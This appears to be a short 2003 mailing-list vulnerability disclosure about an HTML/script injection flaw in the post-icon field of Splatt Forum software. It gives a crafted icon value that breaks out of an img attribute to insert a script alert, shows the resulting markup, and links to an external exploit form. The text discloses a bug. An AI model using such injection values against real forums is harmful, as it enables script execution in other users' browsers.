Splatt Forum html injection code in post icon

Lethalman Tue, 15 Jul 2003 14:03:15 -0700


Any user can inject html code when create a new post.
The bug are in the post icon:
&lt;img src="icon.gif" etc.&gt;
If you create a personalized form with this code:
icon.gif"&gt;&lt;script&gt;alert('bug');&lt;script&gt;&lt;any
tag="
the final code of the post icon is:
&lt;img
src="icon.gif"&gt;&lt;script&gt;alert('bug');&lt;script&gt;&lt;any
tag="" etc.&gt;


The exploit form is here:
http://members.fortunecity.it/lethalman2002/bugs/splatt.html

by Lethal Lab (Lethalman)

Splatt Forum html injection code in post icon

Reply via email to